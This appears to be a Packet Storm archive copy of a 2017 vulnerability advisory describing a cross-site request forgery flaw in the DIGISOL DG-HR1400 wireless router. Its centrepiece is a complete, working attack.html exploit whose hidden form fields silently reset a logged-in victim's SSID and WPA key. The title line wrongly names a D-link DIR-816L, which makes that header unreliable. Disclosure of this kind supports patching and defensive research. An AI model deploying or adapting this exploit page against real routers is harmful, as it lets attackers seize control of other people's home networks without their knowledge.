exploit the possibilities

DIGISOL DG-HR1400 Cross Site Request Forgery

DIGISOL DG-HR1400 Cross Site Request Forgery
Posted Feb 22, 2017
Authored by Indrajith A.N

DIGISOL DG-HR1400 wireless router suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
MD5 | 07159f43eabf68127a0f05c9e490b006

DIGISOL DG-HR1400 Cross Site Request Forgery

Change Mirror Download
Title:
====

D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF)
vulnerability

Credit:
======

Name: Indrajith.A.N

Date:
====

21-02-2017

Vendor:
======

DIGISOL router is a product of Smartlink Network Systems Ltd. is one of
India's leading networking company. It was established in the year 1993 to
prop the Indian market in the field of Network Infrastructure.

Product:
=======


DIGISOL DG-HR1400 is a wireless Router


Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf

Abstract:
=======

Cross-Site Request Forgery (CSRF) vulnerability in the DIGISOL DG-HR1400
wireless router enables an attacker to perform an
unwanted action on a wireless router for which the user/admin is currently
authenticated.


Affected Version:
=============

<=1.00.02


Exploitation-Technique:
===================


Remote


Severity Rating:
===================

7.9



Details:
=======


An attacker who lures a DG-HR1400 authenticated user to browse a malicious
website can exploit cross site request
forgery (CSRF) to submit commands to wireless router and gain control of
the product. The attacker could
submit variety of commands including but not limited to changing the SSID
name, password, security type etc.


Proof Of Concept:
================


1) User login to DG-HR1400 wireless router


2) User visits the attacker's malicious web page (attack.html)


3) attack.html exploits CSRF vulnerability and changes the SSID name and
password


PoC video link:
https://drive.google.com/file/d/0B6715xUqH18MeV9GOVE0ZmFrQUU/view


Exploit code (attack.html):


<html>
Digisol Router CSRF Exploit - Indrajith A.N
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="apssid" value="hacked" />
<input type="hidden" name="startScanUplinkAp" value="0" />
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="hacked" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="6" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method_cur" value="6" />
<input type="hidden" name="method" value="6" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="csrf1234" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit.htm?wlan_basic.htm"
value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Credits:
=======

Indrajith.A.N

Security Analyst.

https://www.indrajithan.com/


--
Indrajith
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    15 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close